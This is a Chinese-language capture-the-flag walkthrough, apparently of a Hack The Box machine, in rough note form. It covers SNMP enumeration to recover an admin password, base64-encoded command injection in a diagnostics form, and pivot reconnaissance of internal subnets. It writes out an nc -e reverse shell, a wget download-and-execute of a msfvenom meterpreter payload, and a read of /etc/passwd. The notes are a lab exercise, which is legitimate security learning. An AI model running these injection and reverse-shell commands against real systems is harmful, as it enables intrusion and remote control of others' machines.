scan 22 /tcp open ssh OpenSSH 7.6 p1 Ubuntu 4 (Ubuntu Linux2048 15 :a4 :28 :77 :ee :13 :07 :06 :34 :09 :86 :fd :6 f:cc :4 c:e2 (RSA )256 89 :5 a:ee :1 c:22 :02 :d2 :13 :40 :f2 :45 :2 e:70 :45 :b0 :c4 (ED25519 )80 /tcp open http Apache httpd 2.4 .18 ((Ubuntu ))
gobuster -u http :img (Status : 301 )tools (Status : 301 )doc (Status : 301 )css (Status : 301 )js (Status : 301 )fonts (Status : 301 )
searchsploit lyghtspeed
google “lightspeed login exploit”
admin’ or ‘1’=’1’
Invalid username/password
sqlmap -r 1.req
info http://10.10.10.105/doc/error_codes.pdf
45007 证书无效或者过期
45009 尚未设置系统凭据
默认管理员用户密码已设置(请参阅机箱序列号)
curl http:// 10.10 .10.105 /tools/ remote.php
nmap snmp scan nmap -sU 10.10.10.105 -vvopen |filtered dhcps no -responseopen snmp udp-response ttl 62
参考资料:nmap-script-scan
locate *snmp*.nse/usr/ share/nmap/ scripts/snmp-brute.nse/usr/ share/nmap/ scripts/snmp-hh3c-logins.nse/usr/ share/nmap/ scripts/snmp-info.nse/usr/ share/nmap/ scripts/snmp-interfaces.nse/usr/ share/nmap/ scripts/snmp-ios-config.nse/usr/ share/nmap/ scripts/snmp-netstat.nse/usr/ share/nmap/ scripts/snmp-processes.nse/usr/ share/nmap/ scripts/snmp-sysdescr.nse/usr/ share/nmap/ scripts/snmp-win32-services.nse/usr/ share/nmap/ scripts/snmp-win32-shares.nse/usr/ share/nmap/ scripts/snmp-win32-software.nse/usr/ share/nmap/ scripts/snmp-win32-users.nse
nmap –script=snmp-info.nse 10.10.10.105 -sU -p 161
nmap –script=snmp-brute.nse 10.10.10.105 -sU -p 161
nmap –script=snmp-processes.nse 10.10.10.105 -sU -p 161
snmpwalk
MIB代表management information base,管理信息库,保存网络中各种设备的参数信息。
snmpwalk -h
snmpwalk -c public -v 1 10.10.10.105
OID对象标识就是3.6.1.2.1.47.1.1.1.1.113.6.1.2.1.47,代表主机或路由器的操作系统
snmpwalk -v1 -c public 10.10.10.105 .3.6.1.2.1.47.1.1.1.1.11
-O OUTOPTS
.1.3.6.1.2.1.47.1.1.1.1.11 = STRING: “SN#NET_45JDX23”
snmpwalk -v1 -c public 10.10.10.105 1.3.6.1.2.1.47.1.1.1.1.11
snmpwalk -c public -v 1 10.10.10.105 system
snmpwalk -v2c -c public 10.10.10.105 .1.3.6.1.2.1.47.4.2.1.2
用admin/NET_45JDX23,登陆后。burp抓包,发现一个post方式的远程命令执行,其中quagga,应该是用户名,此功能可能是检查某用户运行的所有进程。
raw
base64
info
quagga
cXVhZ2dh
root
cm9vdAo=
`root
whoami`
xx
`root
cat /etc/passwd`
cm9vdHxjYXQgL2V0Yy9wYXNzd2Q=
whereis nc
/bin/nc
openbsd类型的nc,没有-e选项
`root
/bin/nc -e /bin/bash 10.10.14.7 9900`
xx
`root
uname -a`
cm9vdHx1bmFtZSAtYQ==
`root
whereis wget`
xx
pwdxx
/root
cat /root/root.txtxx
can’t read root.txt
`root
ls -al`
xx
`root
wget http://10.10.14.7/payload.elf;chmod +x payload.elf;./payload.elf`
root|cd /root;net -e /bin/bash 10.10.14.7 2233|
msfvenom --platform Linux -p linux/x64 /meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9900 -f elf -o payload.elfpython -m SimpleHTTPServer 80 root |wget http://10.10.14.7 /payload.elfhandler -H 10.10.14.7 -P 9900 -p linux/x64 /meterpreter/reverse_tcp
获得shell 通过web rce,msf生成载荷上传运行后,获得meterpreter shell。
info enum 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 find . -name "diag.php" proc /tty/driver': Permission deniedfind: './sys/kernel/debug': Permission deniedfind: './sys/fs/pstore': Permission deniedfind: './sys/fs/fuse/connections/49': Permission deniedfind . -name ".ssh"cd /root/.sshcat authorized_keyscat netstat -an | grep 80 pty; pty.spawn("/bin/bash")'ping -c 4 10.10.10.105traceroute 10.10.10.105 命令未找到nc -nvz 10.10.10.105 1-100Connection to 10.10.10.105 21 port [tcp/*] succeeded! to 10.10.10.105 22 port [tcp/*] succeeded! ssh 10.10.10.105 需要密码
info 通过查看/root/.ssh/authorized_keys,可知,root@web,ppacket@carrier,有两个主机。现在是root@r1,接下来准备渗透另外两个主机。
http://10.10.10.105/doc/diagram_for_tac.png
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 网关ip:10.99.64.1 目标机的ip: 10.99 .64 .2 ,10.78.10.1,10.78.11.1 --- root@r1:~# netstat -an netstat -an | grep 22 tcp 0 0 0.0 .0 .0 :22 0.0 .0 .0 :* LISTEN tcp 0 0 10.99 .64 .2 :22 10.99 .64 .251 :42676 ESTABLISHED tcp 0 0 10.99 .64 .2 :22 10.99 .64 .251 :48050 ESTABLISHED tcp 0 192 10.99 .64 .2 :51982 10.10 .14 .7 :9900 ESTABLISHED tcp 0 10.99 .64 .2 :22 10.99 .64 .251 :48050 ESTABLISHED 发现本地IP,通过9900端口和目标机10.99.64.2,建立连接 --- nc -nvz 10.99 .64 .251 1 -100 22 ,80 open wget http://10.99.64.251,确认该内网ip,就是ip-10.10.10.105 --- ssh 10.99 .64 .251 Permission denied (publickey). 不允许登陆 ssh root@10.99.64.251 --- eth0网关 ping -c 4 10.99 .64 .1 nc -nvz 10.99 .64 .1 1 -100 Connection to 10.99 .64 .1 21 port [tcp/* ] succeeded! Connection to 10.99 .64 .1 22 port [tcp/* ] succeeded! Connection to 10.99 .64 .1 53 port [tcp/* ] succeeded! ssh 10.99 .64 .1 ftp 10.99 .64 .1 ,匿名登陆成功,目录为/,无任何文件,不可写 --- nc -nvz 10.78 .10 .2 1 -100 可能是eth1网段网关 22 open nc -nvz 10.78 .11 .2 1 -100 eth2网关 22 open ssh 10.78 .10 .2 ssh 10.78 .11 .2
ifconfig 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 ifconfig eth0 Link encap:Ethernet HWaddr 00 :16 :3 e:d9 :04 :ea inet addr:10.99.64.2 Bcast:10.99.64.255 Mask:255.255.255.0 inet6 addr: fe80 ::216 :3 eff:fed9 :4 ea/64 Scope:LinkUP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2581 errors:0 dropped:0 overruns:0 frame:0 TX packets:1982 errors:0 dropped:0 overruns:0 carrier:0 collisions :0 txqueuelen:1000 RX bytes:3241601 (3 .2 MB) TX bytes:295977 (295 .9 KB)eth1 Link encap:Ethernet HWaddr 00 :16 :3 e:8 a:f2 :4 f inet addr:10.78.10.1 Bcast:10.78.10.255 Mask:255.255.255.0 inet6 addr: fe80 ::216 :3 eff:fe8 a:f24 f/64 Scope:LinkUP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:223 errors:0 dropped:0 overruns:0 frame:0 TX packets:198 errors:0 dropped:0 overruns:0 carrier:0 collisions :0 txqueuelen:1000 RX bytes:16115 (16 .1 KB) TX bytes:14695 (14 .6 KB)eth2 Link encap:Ethernet HWaddr 00 :16 :3 e:20 :98 :df inet addr:10.78.11.1 Bcast:10.78.11.255 Mask:255.255.255.0 inet6 addr: fe80 ::216 :3 eff:fe20 :98 df/64 Scope:LinkUP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:231 errors:0 dropped:0 overruns:0 frame:0 TX packets:183 errors:0 dropped:0 overruns:0 carrier:0 collisions :0 txqueuelen:1000 RX bytes:16436 (16 .4 KB) TX bytes:13415 (13 .4 KB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1 /128 Scope:HostUP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:196 errors:0 dropped:0 overruns:0 frame:0 TX packets:196 errors:0 dropped:0 overruns:0 carrier:0 collisions :0 txqueuelen:1000 RX bytes:15872 (15 .8 KB) TX bytes:15872 (15 .8 KB)
route 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 Kernel IP routing tableDestination Gateway Genmask Flags Metric Ref Use Ifacedefault 10.99.64.1 0.0.0.0 UG 0 0 0 eth0 10 .78 .10 .0 * 255.255.255.0 U 0 0 0 eth1 10 .78 .11 .0 * 255.255.255.0 U 0 0 0 eth2 10 .99 .64 .0 * 255.255.255.0 U 0 0 0 eth0 10 .100 .10 .0 10.78.10.2 255.255.255.0 UG 0 0 0 eth1 10 .100 .11 .0 10.78.10.2 255.255.255.0 UG 0 0 0 eth1 10 .100 .12 .0 10.78.10.2 255.255.255.0 UG 0 0 0 eth1 10 .100 .13 .0 10.78.10.2 255.255.255.0 UG 0 0 0 eth1 10 .100 .14 .0 10.78.10.2 255.255.255.0 UG 0 0 0 eth1 10 .100 .15 .0 10.78.10.2 255.255.255.0 UG 0 0 0 eth1 10 .100 .16 .0 10.78.10.2 255.255.255.0 UG 0 0 0 eth1 10 .100 .17 .0 10.78.10.2 255.255.255.0 UG 0 0 0 eth1 10 .100 .18 .0 10.78.10.2 255.255.255.0 UG 0 0 0 eth1 10 .100 .19 .0 10.78.10.2 255.255.255.0 UG 0 0 0 eth1 10 .100 .20 .0 10.78.10.2 255.255.255.0 UG 0 0 0 eth1 10 .120 .10 .0 10.78.11.2 255.255.255.0 UG 0 0 0 eth2 10 .120 .11 .0 10.78.11.2 255.255.255.0 UG 0 0 0 eth2 10 .120 .12 .0 10.78.11.2 255.255.255.0 UG 0 0 0 eth2 10 .120 .13 .0 10.78.11.2 255.255.255.0 UG 0 0 0 eth2 10 .120 .14 .0 10.78.11.2 255.255.255.0 UG 0 0 0 eth2 10 .120 .15 .0 10.78.11.2 255.255.255.0 UG 0 0 0 eth2 10 .120 .16 .0 10.78.11.2 255.255.255.0 UG 0 0 0 eth2 10 .120 .17 .0 10.78.11.2 255.255.255.0 UG 0 0 0 eth2 10 .120 .18 .0 10.78.11.2 255.255.255.0 UG 0 0 0 eth2 10 .120 .19 .0 10.78.11.2 255.255.255.0 UG 0 0 0 eth2 10 .120 .20 .0 10.78.11.2 255.255.255.0 UG 0 0 0 eth2
内网python扫描 https://raw.githubusercontent.com/AnthraX1/InsightScan/master/scanner.py
wget http://10.10.14.7/scanner.py
/usr/bin/python3.5 scanner.py -h
python2.7和python3.5不兼容,目标主机只有python3.5,导致该py脚本无法运行。
上传nmap
待续
